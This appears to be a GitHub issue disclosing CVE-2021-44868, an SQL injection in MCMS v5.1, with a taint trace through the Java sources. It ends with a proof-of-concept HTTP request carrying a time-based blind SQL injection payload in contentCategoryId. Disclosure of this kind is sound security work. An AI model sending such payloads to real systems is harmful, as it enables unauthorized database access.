Headline
CVE-2021-44868: MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java hava a SQL Injection Vulnerability · Issue #58 · ming-soft/MCMS
A problem was found in ming-soft MCMS v5.1. There is a sql injection vulnerability in /ms/cms/content/list.do
Vulnerability file:
/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java
#Vulnerability tracking path:
1. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:72行 --The return value of call queryChildren() is tained
2. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:72行 --Tainted value is returned
3. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:168行 --The return value of call
queryChildren() is tained
4. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:168行 --Tainted value is assigned to variable columns
5. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行 --Tainted value enters call iterator() from the this argument, then taints the return value
6. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行 --Tainted value is assigned to variable column~iterator
7. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行 --Tainted value enters call next() from the this argument, then taints the return value
8. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行 --Tainted value is assigned to variable column
9. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:181行 --Tainted value enters call getId() from the this argument, then taints the return value
10. MCMS-master/src/main/java/net/mingsoft/cms/entity/CategoryEntity.java:52行 --Tainted variable this.id is returned
11. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:181行 --Tainted value enters call setCategoryId() from the 1st argument, then taints the this argument
12. MCMS-master/src/main/java/net/mingsoft/cms/entity/ContentEntity.java:148行 --Tainted value is assigned to variable this.categoryId
13. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:183行 --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
14. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java:77行 --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
15. MCMS-master/src/main/java/net/mingsoft/cms/dao/IContentDao.xml:253行 --categoryId
The risk of SQLI
type is triggered, caused by the input parameter categoryId
, value:
poc
POST /ms/cms/content/list.do HTTP/1.1
Host: cms.demo.mingsoft.net
Content-Length: 21
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://cms.demo.mingsoft.net
Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ****
Connection: close
contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'